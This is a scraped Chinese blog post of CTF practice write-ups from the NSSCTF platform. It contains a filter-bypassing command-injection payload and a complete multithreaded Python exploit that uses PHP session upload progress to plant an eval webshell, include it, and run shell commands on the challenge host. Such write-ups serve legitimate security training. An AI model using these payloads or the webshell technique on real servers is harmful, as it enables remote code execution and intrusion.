NSS刷题记录web

最新推荐文章于 2024-04-06 08:18:51 发布
最新推荐文章于 2024-04-06 08:18:51 发布
阅读量130 收藏
点赞数
文章标签: 前端 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a2303716126/article/details/131712046
版权

1、[UUCTF 2022 新生赛]ez_rce

所以构造payload code=printf(`l\s /`);会发现一个目录ffffffff???????  再构造得到flag

2、[第五空间 2021]EasyCleanup

审计代码,一顿乱分析,发现PHPinfo看到session临时文件上传

ok上脚本

import io

import requests
import threading

from cffi.backend_ctypes import xrange

sessid = '0'

def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post( 'http://node4.anna.nssctf.cn:28335/', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_GET["cmd"]);?>'}, files={'file': ('tgao.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):
    while True:
        resp = session.post(f"http://node4.anna.nssctf.cn:28335/?mode=foo&file=/tmp/sess_{sessid}&cmd=system('cd /;ls;cat nssctfasdasdflag');")
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("[+++++++++++++]retry")
            #print(resp.text)
if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in xrange(1,30):
            threading.Thread(target=write,args=(session,)).start()
        for i in xrange(1,30):
            threading.Thread(target=read,args=(session,)).start()
    event.set()

崔三娘
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
2021第五空间网络安全大赛
Huamang的博客
09-17 1172
WebFTP https://github.com/wifeat/WebFTP 根据github的源码,去对网站进行分析,有写到初始账号 但是题目改了密码,登不进 然后下载到题目的Config.php.bak,看到版本是v2.3 出现了git泄漏,无法下载到文件,但是看到了目录结构 找到探针 http://114.115.185.167:32770/Readme/mytz.php http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo 直接找到f
[第五空间 2021]EasyCleanup
ph0ebus的博客
02-03 1122
从一道赛题学习利用session.upload_progress实现恶意文件包含getshell
[UUCTF 2022 新生赛]ez_rce
m0_73612768的博客
01-03 1028
反引号命令执行;shell 绕过关键字过滤;
2022UUCTF-web
bossDDYY的博客
11-03 1913
我们先输入手机号和验证码试试,发现无论请求多少次 hint永远是895547922,结合mt_srand和mt_rand函数 当设置的种子确定(此处的种子时输入的手机号)时,每次的mt_rand都是固定的 我们可以猜测hint就是mt_rand的第一次,而目的验证码就是mt_rand的第二次。而且我们笃定是有上传的网页的,限制了文件类型 我们想要上传的是so,但是LD_PRELOAD也能解析jpg后缀 所以修改后缀上传就可以。sub的值是当前时间的最后一位,也就是保证当前的时间为xxxxxxxx1即可。
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 1075
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload。
nss-3.9 ubuntu linux
12-24
7. **调试与日志**:在遇到问题时,可以查看系统日志(如`/var/log/syslog`或`journalctl`)来获取关于NSS操作的详细信息,或启用更详细的日志记录以帮助诊断问题。 8. **安全应用集成**:了解如何将NSS库集成到...
NSS老诺基亚工具
12-12
【标题】"NSS老诺基亚工具"是一个专为老款诺基亚手机设计的软件,主要用于刷机和解锁操作。这款工具对于那些希望恢复旧手机功能或进行系统升级的用户来说,无疑是一把“神器”。它能帮助用户解决设备运行缓慢、系统...
通信NSS学习技术资料.doc
11-10
【通信NSS学习技术资料】 NSS(Network Switching Subsystem,网络交换子系统)是移动通信系统中的关键组成部分,主要负责处理网络中的呼叫控制、移动性管理和用户数据存储等功能。本资料详细介绍了NSS的日常维护、...
NNS.rar_NSS.rar_nss
09-21
NSS genuin for windows
nss-3.45-with-nspr-4.21.tar.gz
09-30
NSS 3.45与NSPR 4.21源码详解及交叉编译实践》 NSS(Network Security Services)和NSPR(Netscape Portable Runtime)是两个在IT领域中至关重要的开源库,尤其在网络安全和网络应用开发中扮演着核心角色。本文将...
[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce
weixin_46497491的博客
11-07 3856
[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce
EasyCleanup(session文件包含&条件竞争)
qq_52907838的博客
09-26 985
打开就是原码 <?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GET['mode'] == "eval"){ $shell = $_GET['shell'] ?? 'phpinfo();'; if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker"); eval($shell...
刷题日记 date 6.6
m0_64348326的博客
06-06 220
刚开始以为是我的exp有问题,然后又找了网上几个wp的反弹shell也是失效,那么很可能的原因就是靶机没出网,直接将payload替换为命令执行,将读取的flag写入。F12查看源码发现了这段功能代码,也是将上传文件解压到hash生成的目录中,其中的/getflag路由则是记载了flag的存放位置是。2.需要让查询到的密码和输入的密码相等,waf过滤了很多字符,这段代码很明显就是和之前几道题相似,直接一眼quine注入。1.进入后是个登陆框,随便输入即可登陆,但是upload功能被拒绝了,说是权限不足。
[UUCTF 2022 新生赛]ez_rce(1),2024年大厂网络安全面经
最新发布
m0_61549953的博客
04-06 844
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
2021-第五空间智能安全大赛-Web-EasyCleanup
qq_53863234的博客
12-01 1608
打开后看到源码: <?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GET['mode'] == "eval"){ $shell = $_GET['shell'] ?? 'phpinfo();'; if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker"); eval($shell)
[SWPUCTF 2022 新生赛]ez_rce
wyxlsm的博客
03-22 666
在写真不知道怎么下手 我去扫一下 后门文件 是有一些 tp5 的think php的漏洞 不说了 看下一步。这样我们看到flag 值 我们可以去访问他 得到flag。查看一下根目录下的flag 名字的文件。我们可以去访问他 得到。去利用漏洞利用的命令。
[第五空间 2021]web 复现wp
snowlyzz的博客
09-13 607
[第五空间 2021] wp
session.upload_progress文件包含
Aiwin的博客
05-29 812
session.upload_progress文件包含

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值